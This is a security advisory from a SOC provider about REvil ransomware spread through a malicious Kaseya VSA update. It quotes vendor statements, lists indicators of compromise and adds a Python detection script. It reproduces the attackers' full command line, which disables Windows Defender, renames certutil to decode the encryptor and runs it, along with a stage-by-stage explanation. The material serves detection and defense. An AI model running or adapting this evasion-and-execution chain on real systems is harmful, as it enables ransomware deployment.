REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update
Posted Date: 07/02/2021
Published Date: 07/02/2021
Sector: Information Technology & Information Security
DATE(S) ISSUED: 07/02/2021
SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group
“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.
The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.
MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.
While at the time of writing, it is unclear how widespread the incident is, security firm Huntress Labs is reporting that at least four MSPs have been hit so far. However, VSA is also used by regular businesses to manage large computer fleets, meaning the incident is most likely impacting non-MSP entities as well.
According to security firm Sophos, which has also detected the attack via its antivirus telemetry, victims appear to be getting infected with ransomware via a malicious update to Kaseya VSA on-prem servers that disables local antivirus solutions and then deploys a fake Windows Defender app that encrypts local files.”
Huntress Labs' update on the MSP thread: “We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say "Kaseya has been hacked" without evidence).”
Kaseya's official recommendation is to: "IMMEDIATELY shutdown your VSA server until you receive further notice from us.
We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. It's critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA."
SYSTEMS AFFECTED: Kaseya VSA Servers - Windows
Managed Service Providers (MSPs), and any company that provides remote IT services or remote system access to other companies, are affected by this threat.
Kaseya VSA is also used directly by medium and large businesses to manage their own computer fleets, so this attack is not limited to MSPs but affects non-MSP entities as well.
Here are the validated indicators of compromise known at this time:
Ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix"
At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
What this command chain does, stage by stage: the ping against 127.0.0.1 with -n 4979 is a cmd.exe sleep of roughly 83 minutes (one ping per second); the Set-MpPreference call then turns off Windows Defender real-time monitoring, intrusion prevention, IOAV and script scanning, controlled folder access, cloud (MAPS) reporting and sample submission, and drops network protection to audit-only mode; certutil.exe is copied to C:\Windows\cert.exe and a random value is appended so the copy no longer matches the legitimate binary's hash; the copy base64-decodes c:\kworking\agent.crt into c:\kworking\agent.exe; the .crt and the renamed certutil are deleted; and agent.exe, the encryptor, is executed. Any of these stages (a long loopback ping sleep, Defender tampering via Set-MpPreference, a renamed certutil used with -decode, or the c:\kworking path) is worth hunting for on its own.
Other possible Indicators of Compromise (IOCs) identified for the encryptor sample (static file characteristics, useful for triage but weaker than the path, procedure-name and command-line indicators above):
Rich PE header hash
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
File-type identification scores: Windows Control Panel Item (generic) 88.3%; Win64 Executable (generic) 4.7%; Win16 NE executable (generic) 2.2%; Win32 Executable (generic) 2%; OS/2 Executable (generic) 0.9%
File size: 890.88 KB (912264 bytes)
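As an added example (not part of CyFlare's notice or of Kaseya's or Huntress's material), the following Python script turns the command line quoted above into hunt logic that can be run over exported process-creation records, such as the CommandLine field of Sysmon Event ID 1 or Windows Security event 4688. The sample records are constructed for this example; only the srv01 entry is the real command line from the IOC list. The rule names and verdict labels are hypothetical. The logic goes slightly beyond the exact indicators: it also flags the general pattern of certutil copied under a new name and used to -decode a .crt into an .exe, since a variant could change the c:\kworking staging path.

```python
import re

PING_SLEEP_MIN = 60  # loopback pings with a count this large are a delay, not diagnostics

# Constructed sample process-creation records (host plus CommandLine field).
# Only the srv01 record is the real command line from the IOC list above; the
# others are made up to show benign traffic and a lightly altered variant.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmd": r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4 > nul'},
    {"host": "ws02", "cmd": r'certutil.exe -decode C:\Users\alice\cert.b64 C:\Users\alice\cert.pem'},
    {"host": "srv01", "cmd":
        r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
        r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
        r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
        r'-DisableIOAVProtection $true -DisableScriptScanning $true '
        r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
        r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
        r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
        r'echo %RANDOM% >> C:\Windows\cert.exe & '
        r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
        r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'},
    {"host": "srv02", "cmd":
        r'cmd.exe /c copy /Y C:\Windows\System32\certutil.exe C:\Temp\ct.exe & '
        r'C:\Temp\ct.exe -decode C:\Temp\payload.crt C:\Temp\payload.exe & C:\Temp\payload.exe'},
]

# Each rule is a regex over one command line. Rule names are labels chosen for this example.
RULES = {
    # "ping 127.0.0.1 -n 4979" is a cmd.exe sleep (about 83 minutes); the count is captured
    "ping_sleep": re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I),
    # Defender real-time protection switched off from the command line
    "defender_tamper": re.compile(
        r"Set-MpPreference\b[^&]*-DisableRealtimeMonitoring\s+\$true", re.I),
    # certutil.exe copied to a new name (LOLBin evasion)
    "certutil_renamed": re.compile(r"copy\s+/Y\s+\S*certutil\.exe\s+\S+", re.I),
    # any .exe used with -decode to turn a .crt into an .exe
    "decode_to_exe": re.compile(r"\S+\.exe\s+-decode\s+\S+\.crt\s+\S+\.exe", re.I),
    # exact staging path used by the Kaseya "Hot-fix" procedure
    "kworking_path": re.compile(r"c:\\kworking\\agent\.(?:crt|exe)", re.I),
}


def match_rules(cmd):
    """Return the names of all rules that fire on one command line."""
    hits = []
    for name, rx in RULES.items():
        m = rx.search(cmd)
        if not m:
            continue
        if name == "ping_sleep" and int(m.group(1)) < PING_SLEEP_MIN:
            continue  # short loopback pings are normal in scripts and health checks
        hits.append(name)
    return hits


def classify(cmd):
    """Map rule hits to a verdict; returns (verdict, hits)."""
    hits = match_rules(cmd)
    if "kworking_path" in hits or ("defender_tamper" in hits and "decode_to_exe" in hits):
        return "match_kaseya_revil", hits
    if "certutil_renamed" in hits and "decode_to_exe" in hits:
        return "suspicious_certutil_staging", hits
    if "defender_tamper" in hits:
        return "suspicious_defender_tamper", hits
    return "benign", hits


def hunt(events):
    """Run classify() over {"host", "cmd"} records and return the non-benign findings."""
    findings = []
    for ev in events:
        verdict, hits = classify(ev["cmd"])
        if verdict != "benign":
            findings.append((ev["host"], verdict, hits))
    return findings


if __name__ == "__main__":
    for host, verdict, hits in hunt(SAMPLE_EVENTS):
        print(f"{host}: {verdict} ({', '.join(hits)})")
```

The ping threshold keeps ordinary short loopback pings out of the results, and Defender tampering alone is surfaced as suspicious rather than as a confirmed match, since administrators do occasionally run Set-MpPreference by hand; the combination with a certutil decode or the kworking path is what makes the verdict firm.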
The CyFlare SOC is closely monitoring the situation as updates continue to arrive from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down its entire SaaS architecture so it can examine everyone's instances and confirm the incident is isolated to on-premises customers.
At this time, we do not believe any of our customers utilizing Kaseya are compromised. This conclusion is the result of threat hunting searches for the indicators of compromise listed above in each affected customer's environment and in the security solutions CyFlare manages.
For our managed endpoint and SentinelOne MDR customers we have also implemented a global blacklist on one key IOC: the SHA1 hash of the Kaseya VSA ransomware encryptor. Hash blocking covers only that one sample, so the path, procedure-name and command-line indicators above are still being hunted for, since a variant could change the hash.
As more details on this emerging threat arise through the cyber community or through Kaseya notices, your SOC will continue to address them. If there are any further updates, or any indication that one of our affected customers is compromised, we will engage you immediately.
If you have any further questions, comments, or concerns regarding this threat, please do not hesitate to contact your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.
Thank you for your cooperation.